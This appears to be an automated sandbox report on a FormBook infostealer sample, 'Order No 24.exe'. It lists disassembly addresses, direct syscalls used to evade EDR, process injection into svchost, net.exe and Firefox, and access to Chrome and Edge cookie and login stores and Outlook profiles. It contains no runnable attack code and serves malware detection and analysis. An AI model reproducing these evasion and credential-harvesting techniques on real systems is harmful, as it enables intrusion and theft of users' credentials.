                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]2_2_030BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]2_2_030B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]2_2_030C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]2_2_030B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]2_2_030BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]2_2_030C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]2_2_030649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]2_2_030FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]2_2_030BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]2_2_030BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]2_2_0306A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]2_2_03042840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060854 mov eax, dword ptr fs:[00000030h]2_2_03060854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]2_2_03034859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]2_2_03034859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]2_2_030BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]2_2_030BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]2_2_030C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]2_2_030C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030887 mov eax, dword ptr fs:[00000030h]2_2_03030887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC89D mov eax, dword ptr fs:[00000030h]2_2_030BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E8C0 mov eax, dword ptr fs:[00000030h]2_2_0305E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA8E4 mov eax, dword ptr fs:[00000030h]2_2_030FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]2_2_0306C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]2_2_0306C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E6F00 mov eax, dword ptr fs:[00000030h]2_2_030E6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032F12 mov eax, dword ptr fs:[00000030h]2_2_03032F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CF1F mov eax, dword ptr fs:[00000030h]2_2_0306CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EF28 mov eax, dword ptr fs:[00000030h]2_2_0305EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F40 mov eax, dword ptr fs:[00000030h]2_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F40 mov eax, dword ptr fs:[00000030h]2_2_030B4F40
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009BA66C
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009A8189 SetUnhandledExceptionFilter,0_2_009A8189
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009A81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009A81AC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Order No 24.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\net.exeThread register set: target process: 592Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\net.exeThread APC queued: target process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Order No 24.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3F5008Jump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009BB106 LogonUserW,0_2_009BB106
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_00983D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00983D19
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C411C SendInput,keybd_event,0_2_009C411C
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C74BB mouse_event,0_2_009C74BB
                Source: C:\Users\user\Desktop\Order No 24.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Order No 24.exe"Jump to behavior
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009BA66C
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009C71FA
                Source: vqiDHNHvZuv.exe, 00000003.00000002.4576977757.0000000001551000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000000.2190959202.0000000001550000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577408343.0000000001351000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: Order No 24.exe, vqiDHNHvZuv.exe, 00000003.00000002.4576977757.0000000001551000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000000.2190959202.0000000001550000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577408343.0000000001351000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: vqiDHNHvZuv.exe, 00000003.00000002.4576977757.0000000001551000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000000.2190959202.0000000001550000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577408343.0000000001351000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: Order No 24.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: vqiDHNHvZuv.exe, 00000003.00000002.4576977757.0000000001551000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000000.2190959202.0000000001550000.00000002.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577408343.0000000001351000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009A65C4 cpuid 0_2_009A65C4
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_009D091D
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009FB340 GetUserNameW,0_2_009FB340
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009B1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_009B1E8E
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_0099DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0099DDC0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.490000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.490000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4576339259.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4575842016.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2300832029.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2301144839.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4577728076.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4580363583.0000000005160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2301597898.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4577455340.00000000035C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Order No 24.exeBinary or memory string: WIN_81
                Source: Order No 24.exeBinary or memory string: WIN_XP
                Source: Order No 24.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: Order No 24.exeBinary or memory string: WIN_XPe
                Source: Order No 24.exeBinary or memory string: WIN_VISTA
                Source: Order No 24.exeBinary or memory string: WIN_7
                Source: Order No 24.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.490000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.490000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4576339259.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4575842016.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2300832029.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2301144839.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4577728076.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4580363583.0000000005160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
